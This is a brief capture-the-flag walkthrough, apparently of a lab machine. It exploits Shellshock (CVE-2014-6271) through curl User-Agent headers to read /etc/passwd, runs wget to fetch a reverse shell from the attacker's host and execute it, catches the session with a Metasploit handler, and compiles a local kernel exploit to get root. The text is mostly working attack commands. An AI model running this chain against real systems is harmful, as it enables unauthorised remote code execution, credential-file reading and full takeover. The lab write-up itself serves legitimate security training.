Start scanning the target with nmap –A –T4 –p- 192.168.1.10 –vv

Then dirb http://192.168.1.10 /usr/share/dirb/wordlist/big.txt

Didn’t get much from it, so i decided to run nikto –h 192.168.1.10

The target has a vulnerability CVE-2014-6271 google it and found out it’s a shellshock vulnerability and there is a away to view the target passwd file:
curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/cat /etc/passwd’ http://192.168.1.10/cgi-bin/test

Also to view the user id curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /usr/bin/id’ http://192.168.1.10/cgi-bin/test

Now let’s create a reverse shell and try to upload it to the target:

Then upload the shell file to the target:
curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /usr/bin/wget http://192.168.1.8/shell -P /tmp’ http://192.168.1.10/cgi-bin/test
curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/ls -la /tmp’ http://192.168.1.10/cgi-bin/test

curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/chmod +x “/tmp/shell”‘ http://192.168.1.10/cgi-bin/test
curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/bash -c “/tmp/shell”‘ http://192.168.1.10/cgi-bin/test

At the same time start Metasploit and set it up like this:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.8
set lport 4444

And we got a shell back, now let’s see what’s the version and kernel of this box:

Let’s search these output with searchsploit:

locate 33589.c
cp /usr/share/exploitdb/exploits/linux_x86-64/local/33589.c ~/vnik.c
Then transfer it to the target using wget http://192.168.1.8/vnik.c
gcc vnik.c -O2 -o vnik
uname -r
./vnik 0
And when you get root privilege catch the flag on the /root directory:
